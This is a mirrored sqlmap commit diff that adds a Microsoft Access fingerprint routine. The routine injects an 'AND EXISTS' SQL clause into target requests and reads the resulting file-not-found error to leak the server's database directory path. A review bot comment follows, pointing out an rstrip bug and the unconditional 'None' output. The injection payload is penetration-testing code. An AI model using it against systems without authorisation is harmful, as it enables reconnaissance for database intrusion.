mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-26 03:23:48 +03:00
one more ms access update
parent
c98d8fed83
commit
6ad8bbfc8e
|
@ -14,6 +14,8 @@ from lib.core.common import formatDBMSfp
|
||||||
from lib.core.common import formatFingerprint
|
from lib.core.common import formatFingerprint
|
||||||
from lib.core.common import getHtmlErrorFp
|
from lib.core.common import getHtmlErrorFp
|
||||||
from lib.core.common import randomInt
|
from lib.core.common import randomInt
|
||||||
|
from lib.core.common import randomStr
|
||||||
|
from lib.core.common import wasLastRequestError
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
@ -42,13 +44,13 @@ class Fingerprint(GenericFingerprint):
|
||||||
payload = agent.payload(newValue=query)
|
payload = agent.payload(newValue=query)
|
||||||
result = Request.queryPage(payload)
|
result = Request.queryPage(payload)
|
||||||
retVal = "not sandboxed" if result else "sandboxed"
|
retVal = "not sandboxed" if result else "sandboxed"
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
def __sysTablesCheck(self):
|
def __sysTablesCheck(self):
|
||||||
infoMsg = "executing system table(s) existance fingerprint"
|
infoMsg = "executing system table(s) existance fingerprint"
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Microsoft Access table reference updated on 01/2010
|
# Microsoft Access table reference updated on 01/2010
|
||||||
sysTables = {
|
sysTables = {
|
||||||
"97": ("MSysModules2", "MSysAccessObjects"),
|
"97": ("MSysModules2", "MSysAccessObjects"),
|
||||||
|
@ -83,6 +85,30 @@ class Fingerprint(GenericFingerprint):
|
||||||
|
|
||||||
return None
|
return None
|
||||||
|
|
||||||
|
def __getDatabaseDir(self):
|
||||||
|
retVal = None
|
||||||
|
|
||||||
|
infoMsg = "searching for database directory"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
randInt = randomInt()
|
||||||
|
randStr = randomStr()
|
||||||
|
query = agent.prefixQuery("AND EXISTS(SELECT * FROM %s.%s WHERE %d=%d)" % (randStr, randStr, randInt, randInt))
|
||||||
|
query = agent.postfixQuery(query)
|
||||||
|
payload = agent.payload(newValue=query)
|
||||||
|
page = Request.queryPage(payload, content=True)
|
||||||
|
|
||||||
|
if wasLastRequestError():
|
||||||
|
match = re.search("Could not find file\s+'([^']+?)'", page[0])
|
||||||
|
|
||||||
|
if match:
|
||||||
|
retVal = match.group(1).rstrip("%s.mdb" % randStr)
|
||||||
|
|
||||||
|
if retVal.endswith('\\'):
|
||||||
|
retVal = retVal[:-1]
|
||||||
|
|
||||||
|
return retVal
|
||||||
|
|
||||||
def getFingerprint(self):
|
def getFingerprint(self):
|
||||||
value = ""
|
value = ""
|
||||||
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
wsOsFp = formatFingerprint("web server", kb.headersFp)
|
||||||
|
@ -120,6 +146,8 @@ class Fingerprint(GenericFingerprint):
|
||||||
if htmlErrorFp:
|
if htmlErrorFp:
|
||||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||||
|
|
||||||
|
value += "\ndatabase directory: '%s'" % self.__getDatabaseDir()
|
||||||
|
|
||||||
return value
|
return value
|
||||||
|
|
||||||
def checkDbms(self):
|
def checkDbms(self):
|
||||||
|
|
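Review bot: In `__getDatabaseDir`, `match.group(1).rstrip("%s.mdb" % randStr)` treats its argument as a set of characters rather than a suffix, so it strips every trailing character that occurs in the random name or in `.mdb`; it yields the directory only because the path separator normally stops it. Remove the exact suffix instead: after `retVal = match.group(1)`, set `suffix = "%s.mdb" % randStr` and use `if retVal.endswith(suffix): retVal = retVal[:-len(suffix)]`. Separately, `getFingerprint` now always appends `"\ndatabase directory: '%s'"`, so the report shows `'None'` whenever there is no error page or no match; appending the line only when the lookup returned a value avoids that. Indentation is lost on this page, so I cannot confirm that `retVal.endswith('\\')` is nested under `if match:`, where `retVal` cannot be `None`. The new code also uses `re`, but no `import re` appears in the visible import hunk, so both points are worth verifying against the file.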